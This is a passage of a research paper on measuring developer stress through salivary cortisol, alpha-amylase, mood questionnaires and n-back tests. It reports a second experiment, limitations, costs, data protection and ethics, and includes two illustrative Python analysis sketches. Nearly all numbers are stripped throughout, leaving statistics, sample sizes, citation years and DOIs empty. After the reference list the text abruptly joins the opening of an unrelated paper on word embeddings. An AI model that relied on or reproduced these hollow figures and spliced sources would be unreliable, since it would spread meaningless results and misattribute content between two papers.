we also changed the way we induce stress in the participants, in the hope that the changed procedure would produce a stronger reaction. first, we presented the participants with a goal for the work on the software that was hard to reach: we told them that previous participants had done a minimum of fixes for problems highlighted by findbugs in different categories, and that these were the low achievers. second, as the groups were much smaller ( – participants per session), we could recreate an effect similar to the tsst (kirschbaum, ) by simply having evaluators in the room monitoring the work of the participants and pretending to write down remarks on their notepads from time to time while muttering disapproval.

for this experiment we were able to recruit participants from the bachelor course "introduction to software engineering". the participants were randomly distributed over dates, for the control group and for the experiment group, resulting in participants in the experiment group and participants in the control group. again, as in the pilot, the experiment group used our enhanced tool, while the control group used the original tool. none of the participants reported any medical conditions interfering with the stress measurement.

results

the results of the panas questions (see the boxplot figure; missing samples either did not finish or did not fill in the questionnaires fully, see "pilot study" for a description of the layout) show that both groups experienced a decrease in mood, but the decrease was steeper for the control group (median for positive factors declines by , median for negative factors increases by ) than for the experiment group (median for positive factors declines by , median for negative factors increases by ). still, the range of mood change for both groups is spread over a wide spectrum, so the results are not statistically significant (wilcoxon p = . for α = . ) and the effect size (cliff's delta: − . ) is low. performing a repeated measures (rm) anova with time (pre, post) and valence (pos, neg) as within-subject factors and group as between-subjects factor revealed no significant time effect (f( , ) = . , p = . ) but a significant valence effect (f( , ) = . , p < . ) as well as a significant time*valence interaction (f( , ) = . , p = . ). however, no significant group effect (f( , ) = . , p = . ) and no significant interactions with the factor group emerged (p > . in all cases). applying post-hoc analyses on the significant interaction demonstrated a significant increase in negative mood (post > pre, p = . ) and a significant decrease in positive mood (pre > post, p = . ). in general, positive ratings were significantly higher than negative ratings (pre: p < . ; post: p = . ).
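to make the scoring and group comparison above concrete, the following is a minimal python sketch (not the original analysis script) of how the panas mood-change scores and the reported nonparametric comparison could be computed. it assumes a hypothetical per-participant table in which the positive and negative affect sums have already been computed per questionnaire (columns group, panas_pos_pre, panas_pos_post, panas_neg_pre, panas_neg_post); the wilcoxon-type comparison is sketched with the mann-whitney u test because the two groups are independent, and cliff's delta is implemented directly since it is not part of scipy.

```python
import numpy as np
import pandas as pd
from scipy.stats import mannwhitneyu

def cliffs_delta(a, b):
    """cliff's delta effect size: p(a > b) - p(a < b) over all pairs."""
    a, b = np.asarray(a, dtype=float), np.asarray(b, dtype=float)
    greater = sum((x > b).sum() for x in a)
    less = sum((x < b).sum() for x in a)
    return (greater - less) / (len(a) * len(b))

# hypothetical per-participant panas sums for the pre and post work phase
df = pd.read_csv("panas_scores.csv")  # group, panas_pos_pre, panas_pos_post, panas_neg_pre, panas_neg_post

# emotional state = positive sum - negative sum; mood change = post state - pre state
df["mood_change"] = (df["panas_pos_post"] - df["panas_neg_post"]) - (
    df["panas_pos_pre"] - df["panas_neg_pre"]
)

exp = df.loc[df["group"] == "experiment", "mood_change"]
con = df.loc[df["group"] == "control", "mood_change"]

# mann-whitney u comparison of the two independent groups plus effect size
u_stat, p_value = mannwhitneyu(exp, con, alternative="two-sided")
print(f"u = {u_stat:.1f}, p = {p_value:.3f}, cliff's delta = {cliffs_delta(exp, con):.2f}")
```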
from the results of the esr questions (see the tables below), we learned that the control group experienced an increase in disgust and surprise compared to the experiment group. also, both groups show an increase in self-reported stress, but the standard deviation for the experiment group also increased, which implies that at least some participants experienced less stress. the repeated measures (rm) anova shows a significant condition effect (f( , ) = . , p < . ), a trend for a time effect (f( , ) = . , p = . ), with higher values post than pre, and no significant group effect (f( , ) = . , p = . ). moreover, a significant interaction of condition*time (f( , ) = . , p = . ) occurred, while no other interaction reached significance (p > . in all cases). post-hoc tests disentangling the significant interaction revealed a significant increase in anger ratings (post > pre, p = . ) and a significant decrease in happiness ratings (pre > post, p = . ). all other comparisons remained non-significant (p > . ).

figure: panas pos(itive) and neg(ative) mood indicators for the exp(erimental) group (sample size = ) and con(trol) group (sample size = ), study 2.

table: pre and post-experiment task values for esr factors (anger, disgust, happiness, sadness, surprise, fear, stress; mean, standard deviation, median), experiment group, study 2, sample size = .

table: pre and post-experiment task values for esr factors (anger, disgust, happiness, sadness, surprise, fear, stress; mean, standard deviation, median), control group, study 2, sample size = .

figure: n-back correctness for the exp(eriment) group (sample size = ) and con(trol) group (sample size = ), study 2.

the cognitive load results (see the n-back figures; missing samples did not finish both n-backs, see "pilot study" for a description of the layout) again show the same effect as seen in the pilot (a correctness improvement (mean increased by . % points) and a response time improvement (median decreased by about ms) for the experiment group vs. a correctness decrease (mean by % point) for the control group), but the difference is still not statistically significant: the wilcoxon test does not reveal statistical relevance (p = . , α = . ). the slight reduction in response time and increase in correctness for both groups most likely originates from a learning effect. performing the rm anova with time as within-subject factor and group as between-subjects factor showed a significant time effect (f( , ) = . , p = . ), no group effect (f( , ) = . , p = . ), but a significant time*group interaction (f( , ) = . , p = . ). disentangling the significant time*group interaction revealed a significant group difference before the intervention (pre: p = . ), with better performance in the control group. after the intervention (post), no significant group difference emerged (p = . ). while the experimental group did not show a change in performance (pre vs. post, p = . ), the control group showed a significant decrease (pre vs. post, p = . ).
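the repeated-measures analyses reported in this section all follow the same mixed design: a within-subject factor time (pre, post) and a between-subjects factor group. purely as an illustration (not the original analysis script), the sketch below shows how such an analysis could be run in python with the pingouin package on a hypothetical long-format table with columns participant, group, time, and score.

```python
import pandas as pd
import pingouin as pg

# hypothetical long-format data: one row per participant and time point
# columns: participant, group ("experiment"/"control"), time ("pre"/"post"), score
data = pd.read_csv("nback_correctness_long.csv")

# mixed anova: within-subject factor "time", between-subjects factor "group"
aov = pg.mixed_anova(
    data=data,
    dv="score",
    within="time",
    between="group",
    subject="participant",
)
print(aov[["Source", "F", "p-unc", "np2"]])

# post-hoc pairwise tests to disentangle a significant time*group interaction
posthoc = pg.pairwise_tests(
    data=data,
    dv="score",
    within="time",
    between="group",
    subject="participant",
    padjust="bonf",
)
print(posthoc)
```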
the medians of the cortisol measurements (see the table below) for the control group are slightly higher, but the alpha-amylase values are lower. however, these tests show no statistical significance (wilcoxon u for α = . for cortisol (c p = . , c p = . , c p = . ), cliff's delta for cortisol (c : . , c : . , c : . ), t-test for α = . for alpha-amylase (a p = . , a p = . , a p = . ), cliff's delta for alpha-amylase (a : − . , a : − . , a : − . )). the raw data of the hormone levels can be found in the appendix in tables a and a .

figure: n-back reaction time for the exp(eriment) group (sample size = ) and con(trol) group (sample size = ), study 2.

table: cortisol and alpha-amylase scores (offset, peak, and final cortisol in pg/ml and alpha-amylase in u/l; mean, deviation, median, and sample size per group), study 2.

the rm anova with time and group revealed a significant time effect for cortisol (f( , ) = . , p < . ), indicating a significant decrease from t to t (t vs. t : p < . ; t vs. t : p = . ; t vs. t : p < . ), but no group effect (f( , ) = . , p = . ) nor a group*time interaction (f( , ) = . , p = . ). similar to the cortisol analysis, the rm anova for the alpha-amylase indicated a significant time effect (f( , ) = . , p < . ), demonstrating a significant increase from t to t (t vs. t : p < . , t vs. t : p = . ; t vs. t : p < . ), but no significant group effect (f( , ) = . , p = . ) nor a significant group*time interaction (f( , ) = . , p = . ). this means that the experiment group had a lower chemical stress reaction but a higher need for chemical energy, which might be an indicator that the experiment group reached an energy-consuming coping strategy for the given problem sooner. the statistical power increases, which indicates that a larger group or a stronger stress induction could show a more prominent effect. still, the overall design proved to be feasible, and the changes made compared to the pilot have shortened the time needed to analyze the generated data.

limitations

based on lessons learned (and the useful suggestions of two anonymous reviewers), we summarize potential limitations that threaten the validity of results, should our design be adopted.

unreported medical conditions

participants might refrain from revealing severe medical conditions, like addison's disease or cushing's syndrome, which influence the levels of the hormones measured in our design, but we believe that such issues have a negligible impact on the results of studies using our design. first of all, conditions with a severe impact on the measurements are rare; for example, addison's disease affects about . to . per , people in the developed world (neto & de carvalho, ) and cushing's syndrome is even rarer (lindholm et al., ). also, values arising from pathologically changed hormone levels should be visible as outliers in the data.

stress induction

the stress induced in participants has to be large enough to be significant and distinguishable from the (quite low) stress induced by the measurement instruments (n-back, saliva samples and questionnaires). we have tried to balance stress induction vs. quality of measurement with our selected tools.
our collected data has shown that the stress-induction effect has been too low. to plan the stress induction accordingly, we advise taking a closer look at the different ways stress can be induced in psychological research (e.g., kirschbaum ( ) as an example of socially induced stress or kang & fox ( ) as an example of cognitive stress induction).

learning effects of participants

some stress measurement tools (e.g., the n-back test) base their results on the memory and reaction time of the participants. to keep the effect of learning at a minimum, the tests should be randomized to the best possible extent. in our case we used two different versions of the n-back (see "measurement tools").

reuse of the stress task under research

if a task is reused, participants might give away information about the task to future participants. the information flow should be restricted if possible, as uncertainty is part of the stress generation (see "definition of stress"). while in our case the task was reused, it consisted of many subtasks with no clear correct answer, so communication would not have done much harm. it was also part of our design to keep participants uncertain about their performance on the task, as well as about the task itself.

lessons learned

in the following, we report on our experience and the lessons learned in more detail, which we believe are valuable for future research attempts building upon our method.

on effort and monetary costs

the cost per combined measurement (cortisol and alpha-amylase) and basic statistical analysis for one saliva sample was about euros (swiss health care, , http://swisshealthcare.de). this amounts to about euros per participant for the pilot and about euros per participant for the second study. this cost can probably be reduced by arranging a high-volume contract with a laboratory or finding a cheaper provider of this service. also, analyzing only cortisol reduces the cost per measurement by up to more than %. sometimes, as in our case, university departments (e.g., medicine, biology, chemistry) already have a contract with a laboratory or might even be able to provide the analysis themselves.

compared to other equipment for stress measurement, our method lies in the middle of the overall cost range. there are cheap heart rate monitors and skin conductance measurement tools, but it again depends on the study and the aspects to be tested whether they can be used effectively. higher-priced tools, like eeg (electroencephalography), can deliver other, maybe more precise results, but the process is not easily applicable to large groups. also, those tools need consumables, like electrodes, driving up the costs. additionally, we need to keep in mind that the cost for the hormone analysis also covers a small part of the analysis of the results, as most labs deliver basic statistical calculations (mean, median, standard deviation, etc.) with the raw measurement data. the analysis of the results of the other tools mentioned will require the help of medically trained personnel for detailed results rather than just coarse indications, whereas with the data provided by the lab we can analyze effects with basic statistics.

no process is worth the effort if it does not deliver results. our case is somewhat inconclusive. we can identify times with higher and lower stress from our results of the hormone levels.
the additional information gathered (e.g., the n-back results) backs up these results. however, we were not able to find a significant difference between the groups in our studies, but we strongly suppose that this is due to other problems within these experiments (e.g., a sample size that was too small due to data loss) or that the effect we were trying to observe was too small to be observed with this kind of design. in conclusion, we believe that our proposed measurement process can enable non-medical or non-psychological researchers to examine the influence of stress in processes. our proposed measurements allow for a more detailed analysis and are quickly and easily applicable even to larger groups. however, our method can only deliver a first glance at stress-related problems. for in-depth research on stress effects we strongly recommend seeking cooperation with medical or psychological stress scientists.

data protection

we tried to gather as little personal data as possible, but our proposed method will collect sensitive data beyond the usual demographic data of software engineering studies, that is, medical data. besides adhering to the local laws on data protection, we believe that extra care should be taken when gathering, storing, and processing these data. before the pilot, we had an extensive discussion with the data protection agency, a german federal agency in charge of enforcing and consulting on data protection laws. we decided to remove the personalization of the data points (pseudo-anonymised data). we speak of pseudo-anonymised data because the recent european data protection law explicitly uses this term, in contrast to the old law, which defined the term "anonymised data". pseudo-anonymisation is reached when no relation can easily be established to the personal data (e.g., names, gender, …), in contrast to full anonymisation, where the relation to personal data cannot be re-established under any circumstances. in our case, we would only be able to re-establish the connection to personal data if we had access to the data of all university students and, even then, only with a tiny probability. in other words, we cannot re-establish the connection. it is even more important to supply a written statement that explains what data will be gathered and for what purpose, and that covers the right to revoke the agreement, and with it the permission to use the gathered data, at any time. with his or her signature, each participant should agree to these terms beforehand. this also shows the participants that their personal data will be handled securely and fairly.

effectiveness and ethics of stress induction techniques

the issue of putting human participants under stress despite the potential health risks has to be addressed. we believe that the risk of permanent problems as a result of an experiment as described here is very low. the stress created is only temporary and is not more severe than day-to-day stress peaks. still, it might be desirable to screen potential participants for preexisting issues which can amplify the negative effects of stress (e.g., a mental disorder). it is also necessary to fully inform the participants about the stress parts of the experiment beforehand if possible. additionally, we advise contacting an ethics committee, if available, especially if drastic changes to the stress induction are made.
in our experience, however, a formal investigation by an ethics committee is not necessary for this kind of study. additionally, we believe that there is a similarity with the issues in controlled experiments observing affect (moods, emotions). as summarized by graziotin ( ), several studies have doubted the effectiveness of short mood-induction techniques for psychological experiments, where participants' affect is manipulated through several techniques, for example, watching a sad movie; effective long-term induction techniques, on the other hand, might raise several ethical concerns, for example, as with the facebook emotion contagion experiment (shaw, ). seeing how difficult it has been for us to manipulate stress when employing a robust methodology, we wonder whether the same mechanisms occur for stress induction techniques, and whether we should rather perform in situ studies. however, this reasoning is speculation at this point. future studies should address the question of whether stress induction techniques are ineffective for controlled experiments.

conclusion

in this work, we provided a brief introduction to stress theories and the effects of short-term and long-term exposure on mind and body. we explained how the world of software development is also saturated by stress-inducing events. we discussed how stress can be measured and proposed an efficient way to enable software engineering research to investigate the effects of stress on different processes, including software engineering applications. we used our proposed measurement technique in two experiments, rendering the approach feasible and applicable to research on larger groups in software engineering. with this, we hope to ease the transfer of medical and psychological methods and knowledge to software engineering.

appendix

appendix of raw data: raw data of cortisol and alpha-amylase scores

table a: results of the measurement of cortisol (picograms per milliliter) in the gathered saliva samples of the first experiment; columns c(s ) to c(s ) for the cont(rol) and exp(eriment) groups, with median, average, t-test p-value, and cliff's delta per sampling point.

table a: results of the measurement of alpha-amylase (international units per liter) in the gathered saliva samples of the first experiment; columns a(s ) to a(s ) for the cont(rol) and exp(eriment) groups, with median, average, wilcoxon u p-value, and cliff's delta per sampling point.
table a: results of the measurement of cortisol (picograms per milliliter) in the gathered saliva samples of the second experiment; columns c(s ) to c(s ) for the cont(rol) and exp(eriment) groups, with average, median, wilcoxon u p-value, and cliff's delta per sampling point.

table a: results of the measurement of alpha-amylase (international units per liter) in the gathered saliva samples of the second experiment; columns a(s ) to a(s ) for the cont(rol) and exp(eriment) groups, with average, median, t-test p-value, and cliff's delta per sampling point.

questionnaires
socio-demographic questions, panas and esr (in the german translation as used by schneider et al. ( )), and self-efficacy questions.

acknowledgements
we thank our participants for taking part in our study. we are grateful for the feedback provided by two anonymous reviewers and the editor. our thanks to katharina plett for the professional proofreading of this article.

additional information and declarations

funding
the authors received no funding for this work.

competing interests
stefan wagner is an academic editor for peerj.

author contributions
- jan-peter ostberg conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- daniel graziotin analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- stefan wagner analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- birgit derntl conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability: all the data is available in the appendices.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
akula b, cusick j. . impact of overtime and stress on software quality. in: th international symposium on management, engineering, and informatics (mei ), orlando, florida, usa.
amin a, basri s, hassan mf, rehman m. . software engineering occupational stress and knowledge sharing in the context of global software development. in: national postgraduate conference (npc). ieee, – .
andreassi jl. . psychophysiology: human behavior & physiological response. east sussex: psychology press.
bandura a. . self-efficacy: the exercise of control. new york: macmillan publishers.
behroozi m, lui a, moore i, ford d, parnin c. .
dazed: measuring the cognitive load of solving technical interview problems at the whiteboard. in: proceedings of the th international conference on software engineering: new ideas and emerging results, icse-nier ’ . new york: acm, – . birbaumer n, schmidt rf. . biologische psychologie. seventh edition. berlin: springer-verlag. boucsein w. . arbeitspsychologische beanspruchungsforschung heute—eine herausforderung an die psychophysiologie. psychologische rundschau ( ): – . boucsein w. . psychophysiology in the workplace—goals and methods. international journal of psychophysiology ( ): doi . / - ( ) -c. brown ja, ivanov v, rogers a, succi g, tormasov a, yi j. . toward a better understanding of how to develop software under stress-drafting the lines for future research. available at http://arxiv.org/abs/ . . cannon wb. . bodily changes in pain, hunger, fear and rage: an account of recent researches into the function of emotional excitement. jama ( ): . chatterton rt, vogelsong km, lu y-c, ellman ab, hudgens ga. . salivary α-amylase as a measure of endogenous adrenergic activity. clinical physiology ( ): – doi . /j. - x. .tb .x. chiappelli f, iribarren fj, prolo p. . salivary biomarkers in psychobiological medicine. bioinformation ( ): – doi . / . chilton ma, hardgrave bc, armstrong dj. . performance and strain levels of it workers engaged in rapidly changing environments: a person-job fit perspective. acm sigmis database: the database for advances in information systems ( ): – doi . / . . cohen s. . aftereffects of stress on human performance and social behavior: a review of research and theory. psychological bulletin ( ): – doi . / - . . . . cohen s, janicki-deverts d, miller ge. . psychological stress and disease. jama ( ): – doi . /jama. . . . cohen s, kamarck t, mermelstein r. . a global measure of perceived stress. journal of health and social behavior ( ): – doi . / . cohen s, kessler rc, gordon lu. . measuring stress: a guide for health and social scientists. oxford: oxford university press. cruz s, da silva fq, capretz lf. . forty years of research on personality in software engineering: a mapping study. computers in human behavior : – doi . /j.chb. . . . de jonge bp, jan b, ybema jf, de wolff cj. . psychosocial aspects of occupational stress. handbook of work and organizational psychology: work psychology : . feldt r, torkar r, angelis l, samuelsson m. . towards individualized software engineering. in: cheng l-t, sillito j, storey m-a, tessem b, venolia g, de souza c, dittrich y, john m, hazzan o, maurer f, sharp h, singer j, sim se, eds. towards individualized software engineering, volume the international workshop. new york: acm press, – . folkman s. . the case for positive emotions in the stress process. anxiety, stress, and coping ( ): – doi . / . fritz t, begel a, müller sc, yigit-elliott s, züger m. . using psycho-physiological measures to assess task difficulty in software development. in: proceedings of the th international conference on software engineering. acm, – . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - ( ) -c http://arxiv.org/abs/ . http://dx.doi.org/ . /j. - x. .tb .x http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /jama. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fujigaki y, asakura t, haratani t. . 
work stress and depressive symptoms among japanese information systems managers. industrial health ( ): – doi . /indhealth. . . gevins a, cutillo b. . neuroelectric evidence for distributed processing in human working memory. electroencephalography and clinical neurophysiology ( ): – doi . / - ( ) -g. goldstein ds. . clinical assessment of sympathetic responses to stress. annals of the new york academy of sciences ( ): – doi . /j. - . .tb .x. graziotin d. . towards a theory of affect and software developers’ performance. phd thesis. free university of bozen-bolzano, italy. graziotin d, fagerholm f, wang x, abrahamsson p. . on the unhappiness of software developers. in: proceedings of the st international conference on evaluation and assessment in software engineering (ease’ ). new york: acm press, – . graziotin d, wang x, abrahamsson p. a. the affect of software developers: common misconceptions and measurements. in: th international workshop on cooperative and human aspects of software engineering (chase). ieee/acm, – . graziotin d, wang x, abrahamsson p. b. understanding the affect of developers: theoretical background and guidelines for psychoempirical software engineering. in: proceedings of the th international workshop on social software engineering. acm, – . gren l. . standards of validity and the validity of standards in behavioral software engineering research. new york: acm press. hellhammer dh, wüst s, kudielka bm. . salivary cortisol as a biomarker in stress research. psychoneuroendocrinology ( ): – doi . /j.psyneuen. . . . hjortskov n, rissén d, blangsted ak, fallentin n, lundberg u, søgaard k. . the effect of mental stress on heart rate variability and blood pressure during computer work. european journal of applied physiology ( – ): – doi . /s - - -z. hyman j, baldry c, scholarios d, bunzel d. . work-life imbalance in call centres and software development. british journal of industrial relations ( ): – doi . / - . . hyun j, sliwinski mj, smyth jm. . waking up on the wrong side of the bed: the effects of stress anticipation on working memory in daily life. journals of gerontology ( ): – doi . /geronb/gby . janke w, erdmann g, boucsein w. . der stressverarbeitungsfragebogen (svf). göttingen: hogrefe, . jennett c, cox al, cairns p, dhoparee s, epps a, tijs t, walton a. . measuring and defining the experience of immersion in games. international journal of human–computer studies ( ): – doi . /j.ijhcs. . . . jerusalem m, schwarzer r. . skala zur allgemeinen selbstwirksamkeitserwartung. skalen zur erfassung von lehrer-und schülermerkmalen. in: dokumentation der psychometrischen verfahren im rahmen der wissenschaftlichen begleitung des modellversuchs selbstwirksame schulen. berlin: freie universität. kang d-h, fox c. . neuroendocrine and leukocyte responses and pulmonary function to acute stressors. annals of behavioral medicine ( ): – doi . /bf . kanner ad, coyne jc, schaefer c, lazarus rs. . comparison of two modes of stress measurement: daily hassles and uplifts versus major life events. journal of behavioral medicine ( ): – doi . /bf . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /indhealth. . http://dx.doi.org/ . / - ( ) -g http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.psyneuen. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / - . http://dx.doi.org/ . /geronb/gby http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ kaufmann i, pornschlegel h, udris i. . arbeitsbelastung und beanspruchung. humane arbeit-leitfaden für arbeitnehmer : – . khalfa s, bella sd, roy m, peretz i, lupien sj. . effects of relaxing music on salivary cortisol level after psychological stress. annals-new york academy of sciences : – . king mf, bruner gc. . social desirability bias: a neglected aspect of validity testing. psychology & marketing ( ): – doi . /(sici) - ( ) : < ::aid-mar > . .co; - . kirschbaum c. . trier social stress test. encyclopedia of psychopharmacology : – . kirschbaum c, hellhammer dh. . salivary cortisol in psychoneuroendocrine research: recent developments and applications. psychoneuroendocrinology ( ): – doi . / - ( ) - . kogler l, seidel e-m, metzler h, thaler h, boubela rn, pruessner jc, kryspin-exner i, gur rc, windischberger c, moser e, habel u, derntl b. . impact of self-esteem and sex on stress reactions. scientific reports ( ): doi . /s - - -w. lademann j, mertesacker h, gebhardt b. . psychische erkrankungen im fokus der gesundheitsreporte der krankenkassen. psychotherapeutenjournal ( ): – . lazarus rs. . psychological stress and the coping process. new york: mcgraw-hill education. lazarus rs. . theory-based stress measurement. psychological inquiry ( ): – doi . /s pli _ . lenberg p, feldt r, wallgren lg. . behavioral software engineering: a definition and systematic literature review. journal of systems and software : – doi . /j.jss. . . . lindholm j, juul s, jørgensen jol, astrup j, bjerre p, feldt-rasmussen u, hagen c, jørgensen j, kosteljanetz m, kristensen l, laurberg p, schmidt k, weeke j. . incidence and late prognosis of cushing’s syndrome: a population-based study. journal of clinical endocrinology & metabolism ( ): – . lohmann-haislah a. . psychische anforderungen, ressourcen und befinden. dortmund-berlin-dresden: bundesanstalt für arbeitsschutz und arbeitsmedizin. meier a, kropp m, anslow c, biddle r. . stress in agile software development: practices and outcomes. cham: springer international publishing, – . mueller st, piper bj. . the psychology experiment building language (pebl) and pebl test battery. journal of neuroscience methods : – doi . /j.jneumeth. . . . müller sc, fritz t. . using (bio) metrics to predict code quality online. in: proceedings of the th international conference on software engineering. acm, – . nater um, rohleder n, gaab j, berger s, jud a, kirschbaum c, ehlert u. . human salivary alpha-amylase reactivity in a psychosocial stress paradigm. international journal of psychophysiology ( ): – doi . /j.ijpsycho. . . . neto rab, de carvalho jf. . diagnosis and classification of addison’s disease (autoimmune adrenalitis). autoimmunity reviews ( – ): – doi . /j.autrev. . . . noack h, nolte l, nieratschker v, habel u, derntl b. . imaging stress: an overview of stress induction methods in the mr scanner. journal of neural transmission ( ): – doi . /s - - -y. noto y, sato t, kudo m, kurata k, hirota k. . the relationship between salivary biomarkers and state-trait anxiety inventory score under mental arithmetic stress: a pilot study. anesthesia & analgesia ( ): – doi . / .ane. . . d. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-mar % e . .co; - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /s pli _ http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . /j.ijpsycho. . . http://dx.doi.org/ . /j.autrev. . . 
http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / .ane. . . d http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ostberg j-p, graziotin d, wagner s, derntl b. . towards the assessment of stress and emotional responses of a salutogenesis-enhanced software tool using psychophysiological measurements. in: proceedings of the nd international workshop on emotion awareness in software engineering. ieee press, – . ostberg j-p, wagner s. . at ease with your warnings: the principles of the salutogenesis model applied to automatic static analysis. in: ieee rd international conference on software analysis, evolution, and reengineering (saner). vol. . – . paulhus dl. . measurement and control of response bias. in: robinson jp, shaver pr, wrightsman ls, eds. measures of social psychological attitudes: measures of personality and social psychological attitudes. vol. . cambridge: academic press. peacock ej, wong pt. . the stress appraisal measure (sam): a multidimensional approach to cognitive appraisal. stress and health ( ): – . pittenger dj. . the utility of the myers-briggs type indicator. review of educational research ( ): – doi . / . plarre k, raij a, hossain sm, ali aa, nakajima m, al’absi m, ertin e, kamarck t, kumar s, scott m, siewiorek d, smailagic a, wittmers le. . continuous inference of psychological stress from sensory measurements collected in the natural environment. in: th international conference on information processing in sensor networks (ipsn). ieee, – . pressman sd, cohen s. . does positive affect influence health? psychological bulletin ( ): – doi . / - . . . . rahe rh. . stressful life events-their nature and effects. psychosomatic medicine ( ): – doi . / - - . rajeswari k, anantharaman r. . development of an instrument to measure stress among software professionals: factor analytic study. in: proceedings of the sigmis conference on computer personnel research. acm, – . reinhardt t, schmahl c, wüst s, bohus m. . salivary cortisol, heart rate, electrodermal activity and subjective stress responses to the mannheim multicomponent stress test (mmst). psychiatry research ( ): – doi . /j.psychres. . . . richter p, hacker w. . belastung und beanspruchung: stress, ermüdung und burnout im arbeitsleben. heidelberg: asanger roland verlag. rommel e, pimlott j. . rommel: in his own words. london: amber books ltd. schneider f, gur rc, gur re, muenz lr. . standardized mood induction with happy and sad facial expressions. psychiatry research ( ): – doi . / - ( ) - . schneider f, weiss u, kessler c, müller-gärtner h-w, posse s, salloum jb, grodd w, himmelmann f, gaebel w, birbaumer n. . subcortical correlates of differential classical conditioning of aversive emotional reactions in social phobia. biological psychiatry ( ): – . schwarz n. . self-reports: how the questions shape the answers. american psychologist ( ): – doi . / - x. . . . selye h. . the general adaptation syndrome and the diseases of adaptation . journal of clinical endocrinology & metabolism ( ): – doi . /jcem- - - . selye h. . the stress of life (revised edition). new york: mcgraw-hill. shaw d. . facebook’s flawed emotion experiment: antisocial research on social network users. research ethics ( ): – doi . / . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - - http://dx.doi.org/ . /j.psychres. . . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /jcem- - - http://dx.doi.org/ . 
sonnentag s, brodbeck fc, heinbokel t, stolte w. . stressor-burnout relationship in software development teams. journal of occupational and organizational psychology ( ): – doi . /j. - . .tb .x.
strahler j, skoluda n, kappert mb, nater um. . simultaneous measurement of salivary cortisol and alpha-amylase: application and recommendations. neuroscience & biobehavioral reviews : – doi . /j.neubiorev. . . .
suni lopez f, condori-fernández n, catala bolos a. . towards real-time automatic stress detection for office workplaces. in: proceedings of the th international conference, simbig, lima, peru.
thompson cw, roe j, aspinall p, mitchell r, clow a, miller d. . more green space is linked to less stress in deprived communities: evidence from salivary cortisol patterns. landscape and urban planning ( ): – doi . /j.landurbplan. . . .
van eck m, berkhof h, nicolson n, sulon j. . the effects of perceived stress, traits, mood states, and stressful daily events on salivary cortisol. psychosomatic medicine ( ): – doi . / - - .
vrijkotte tg, van doornen lj, de geus ej. . effects of work stress on ambulatory blood pressure, heart rate, and heart rate variability. hypertension ( ): – doi . / .hyp. . . .
wagner s, mendez d, felderer m, graziotin d, kalinowski m. . challenges in survey research. in: felderer m, travassos gh, eds. contemporary empirical methods in software engineering. cham: springer international publishing, – .
watson d, clark la, tellegen a. . development and validation of brief measures of positive and negative affect: the panas scales. journal of personality and social psychology ( ): – doi . / - . . . .
weinert ab. . organisations- und personalpsychologie. weinheim: verlagsgruppe beltz.
weiss u, salloum jb, schneider f. . correspondence of emotional self-rating with facial expression. psychiatry research ( ): – doi . /s - ( ) - .
world health organization and others. . health factors involved in working under conditions of heat stress: report of a who scientific group. geneva: world health organization. available at https://apps.who.int/iris/bitstream/handle/ / /who_trs_ .pdf.
world health organization. . mental health: facing the challenges, building solutions: report from the who european ministerial conference. copenhagen: who regional office europe. available at https://www.euro.who.int/__data/assets/pdf_file/ / /e .pdf.
improving distributional similarity with lessons learned from word embeddings

omer levy, yoav goldberg, ido dagan
computer science department, bar-ilan university, ramat-gan, israel
{omerlevy,yogo,dagan}@cs.biu.ac.il

abstract

recent trends suggest that neural-network-inspired word embedding models outperform traditional count-based distributional models on word similarity and analogy detection tasks. we reveal that much of the performance gains of word embeddings are due to certain system design choices and hyperparameter optimizations, rather than the embedding algorithms themselves. furthermore, we show that these modifications can be transferred to traditional distributional models, yielding similar gains. in contrast to prior reports, we observe mostly local or insignificant performance differences between the methods, with no global advantage to any single approach over the others.

introduction

understanding the meaning of a word is at the heart of natural language processing (nlp). while a deep, human-like, understanding remains elusive, many methods have been successful in recovering certain aspects of similarity between words.

recently, neural-network based approaches in which words are "embedded" into a low-dimensional space were proposed by various authors (bengio et al., ; collobert and weston, ). these models represent each word as a d-dimensional vector of real numbers, and vectors that are close to each other are shown to be semantically related. in particular, a sequence of papers by mikolov et al. ( a; b) culminated in the skip-gram with negative-sampling training method (sgns): an efficient embedding algorithm that provides state-of-the-art results on various linguistic tasks. it was popularized via word2vec, a program for creating word embeddings.

a recent study by baroni et al. ( ) conducts a set of systematic experiments comparing word2vec embeddings to the more traditional distributional methods, such as pointwise mutual information (pmi) matrices (see turney and pantel ( ) and baroni and lenci ( ) for comprehensive surveys). these results suggest that the new embedding methods consistently outperform the traditional methods by a non-trivial margin on many similarity-oriented tasks. however, state-of-the-art embedding methods are all based on the same bag-of-contexts representation of words. furthermore, analysis by levy and goldberg ( c) shows that word2vec's sgns is implicitly factorizing a word-context pmi matrix. that is, the mathematical objective and the sources of information available to sgns are in fact very similar to those employed by the more traditional methods.

